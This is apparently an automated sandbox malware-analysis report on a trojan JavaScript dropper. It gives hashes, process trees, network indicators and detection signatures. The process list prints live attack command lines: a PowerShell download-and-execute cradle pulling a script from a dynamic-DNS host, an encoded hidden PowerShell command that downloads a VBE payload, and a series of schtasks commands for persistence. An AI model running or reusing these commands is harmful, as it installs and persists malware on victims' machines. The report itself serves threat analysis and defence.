analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

344890f3425e8f296021453ad03f5ca908d78684099be997e3ebabbc11acd741.js

Full analysis: https://app.any.run/tasks/045d957e-3412-4485-937c-5dffe1347f60
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 11, 2019, 08:29:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

C3E81098FE55BF192C3BC0CA2A4900CE

SHA1:

2EB88B870A3BCFEFE7ADD0DCD814A6DC4922F846

SHA256:

344890F3425E8F296021453AD03F5CA908D78684099BE997E3EBABBC11ACD741

SSDEEP:

96:RkJuowcqfjFKqxwJkKokJuowcqrqxwJRXC7kJuowcqrqxwJNTEsogeCXINemWtV3:SZqfjFKquJkKTZqrquJRXCEZqrquJlsE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3808)
      • cmd.exe (PID: 3952)
      • cmd.exe (PID: 916)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3668)
      • cmd.exe (PID: 916)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3728)
      • schtasks.exe (PID: 3196)
      • schtasks.exe (PID: 3464)
      • schtasks.exe (PID: 3756)
      • schtasks.exe (PID: 3724)
      • schtasks.exe (PID: 2536)
      • schtasks.exe (PID: 3780)
      • schtasks.exe (PID: 2292)
      • schtasks.exe (PID: 2904)
      • schtasks.exe (PID: 2240)
      • schtasks.exe (PID: 3016)
      • schtasks.exe (PID: 3764)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3500)
      • powershell.exe (PID: 3668)
      • powershell.exe (PID: 3560)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2820)
    • Connects to unusual port

      • powershell.exe (PID: 3500)
      • powershell.exe (PID: 3560)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
19
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe powershell.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2820"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\344890f3425e8f296021453ad03f5ca908d78684099be997e3ebabbc11acd741.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3808"C:\Windows\System32\cmd.exe" /c powershell -w 1 IEX (New-Object Net.WebClient).downloadstring('http://mynetwork.ddns.net:880/aramco-p443.ps1');C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3952"C:\Windows\System32\cmd.exe" /c powershell -window hidden -enc CgAkAGQAbwB3AG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAKACQAdQByAGwAIAAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AbQB5AG4AZQB0AHcAbwByAGsALgBkAGQAbgBzAC4AbgBlAHQAOgA4ADgAMAAvAEMASABGAGUAZQBkAHMALgB2AGIAZQAnADsACgAkAGYAaQBsAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXAAnACsAJAB7AGUAbgB2ADoAdQBzAGUAcgBuAGEAbQBlAH0AKwAnAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAE0AaQBjAHIAbwBzAG8AZgB0AFwARgBlAGUAZABzAFwAQwBIAEYAZQBlAGQAcwAuAHYAYgBlACcAOwAKACQAZABvAHcAbgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACQAZgBpAGwAZQApADsACgAkAGUAeABlAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABzAGgAZQBsAGwALgBhAHAAcABsAGkAYwBhAHQAaQBvAG4A C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
916"C:\Windows\System32\cmd.exe" /c powershell -window hidden schtasks.exe /CREATE /SC DAILY /TN "1" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 01:00 /f && schtasks.exe /CREATE /SC DAILY /TN "3" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 03:00 /f && schtasks.exe /CREATE /SC DAILY /TN "5" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 05:00 /f && schtasks.exe /CREATE /SC DAILY /TN "7" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 07:00 /f && schtasks.exe /CREATE /SC DAILY /TN "9" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 09:00 /f && schtasks.exe /CREATE /SC DAILY /TN "11" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 11:00 /f && schtasks.exe /CREATE /SC DAILY /TN "13" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 13:00 /f && schtasks.exe /CREATE /SC DAILY /TN "15" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 15:00 /f && schtasks.exe /CREATE /SC DAILY /TN "17" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 17:00 /f && schtasks.exe /CREATE /SC DAILY /TN "19" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 19:00 /f && schtasks.exe /CREATE /SC DAILY /TN "21" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 21:00 /f && schtasks.exe /CREATE /SC DAILY /TN "23" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 23:00 /f C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3500powershell -w 1 IEX (New-Object Net.WebClient).downloadstring('http://mynetwork.ddns.net:880/aramco-p443.ps1');C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3560powershell -window hidden -enc CgAkAGQAbwB3AG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAKACQAdQByAGwAIAAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AbQB5AG4AZQB0AHcAbwByAGsALgBkAGQAbgBzAC4AbgBlAHQAOgA4ADgAMAAvAEMASABGAGUAZQBkAHMALgB2AGIAZQAnADsACgAkAGYAaQBsAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXAAnACsAJAB7AGUAbgB2ADoAdQBzAGUAcgBuAGEAbQBlAH0AKwAnAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAE0AaQBjAHIAbwBzAG8AZgB0AFwARgBlAGUAZABzAFwAQwBIAEYAZQBlAGQAcwAuAHYAYgBlACcAOwAKACQAZABvAHcAbgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACQAZgBpAGwAZQApADsACgAkAGUAeABlAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABzAGgAZQBsAGwALgBhAHAAcABsAGkAYwBhAHQAaQBvAG4A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3668powershell -window hidden schtasks.exe /CREATE /SC DAILY /TN "1" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 01:00 /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3728"C:\Windows\system32\schtasks.exe" /CREATE /SC DAILY /TN 1 /TR C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe /ST 01:00 /fC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3756schtasks.exe /CREATE /SC DAILY /TN "3" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 03:00 /f C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2536schtasks.exe /CREATE /SC DAILY /TN "5" /TR "C:\Users\admin\AppData\Local\Microsoft\Feeds\chfeeds.vbe" /ST 05:00 /f C:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
829
Read events
642
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXTCW6ER7GIMO21U9OVO.temp
MD5:
SHA256:
3668powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9MEK68V5AYZ9SPJNG2BS.temp
MD5:
SHA256:
3560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VB1O6WLNLRAGXO4M0SJY.temp
MD5:
SHA256:
3500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3668powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20da66.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3668powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20da76.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3560powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20dab4.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3560
powershell.exe
GET
179.43.160.187:880
http://mynetwork.ddns.net:880/CHFeeds.vbe
CH
malicious
3500
powershell.exe
GET
179.43.160.187:880
http://mynetwork.ddns.net:880/aramco-p443.ps1
CH
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3560
powershell.exe
179.43.160.187:880
mynetwork.ddns.net
Private Layer INC
CH
malicious
3500
powershell.exe
179.43.160.187:880
mynetwork.ddns.net
Private Layer INC
CH
malicious

DNS requests

Domain
IP
Reputation
mynetwork.ddns.net
  • 179.43.160.187
malicious

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET TROJAN APT33/CharmingKitten DDNS Overlap Domain in DNS Lookup M1
A Network Trojan was detected
ET TROJAN APT33/CharmingKitten DDNS Overlap Domain in DNS Lookup M1
3500
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious behavior - PowerShell script downloading from non-standard port
No debug info